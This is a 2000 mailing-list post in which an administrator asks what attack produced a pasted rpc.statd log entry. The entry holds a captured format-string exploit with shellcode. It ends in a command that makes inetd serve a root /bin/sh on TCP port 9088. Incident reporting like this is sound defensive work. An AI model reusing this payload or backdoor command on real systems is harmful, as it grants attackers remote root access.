Security Incidents mailing list archives
What kind of attack?
From: "Christopher A. Romp" <romper () iastate edu>
Date: Tue, 17 Oct 2000 20:19:31 -0500
What kind of attack is this?: Oct 16 18:50:33 maximus rpc.statd[298]: SM_MON request for hostname containing '/': üöÿ¿üöÿ¿ýöÿ¿ýöÿ¿þöÿ¿þöÿ¿ÿöÿ¿ÿöÿ¿08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 0000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000bf fff6fc0000000000000000000000000000000000000000000000000000000bffff6fd0000bff ff6fe00000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000bffff6ff ëK^v¬î ^(Æ ^°î ^.Æ Ã ë#^´1Àî F'F*Æ F«F¸°+, óN¬V¸Í1ÛØ@Íè°ÿÿÿ/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >> /tmp/m; /usr/sbin/inetd /tmp/m; Obviously it was an attempt to gain a root shell on my system, which failed, but I'm curious as to what it was trying to exploit, and where I can find more information on this attack. Thanks. Chris Romp romper () iastate edu ---------------------- Please enter any 11-digit prime number to continue...
Current thread:
- What kind of attack? Christopher A. Romp (Oct 19)
- Re: What kind of attack? Jose Nazario (Oct 19)
- <Possible follow-ups>
- Re: What kind of attack? Cashdollar, Larry (Oct 19)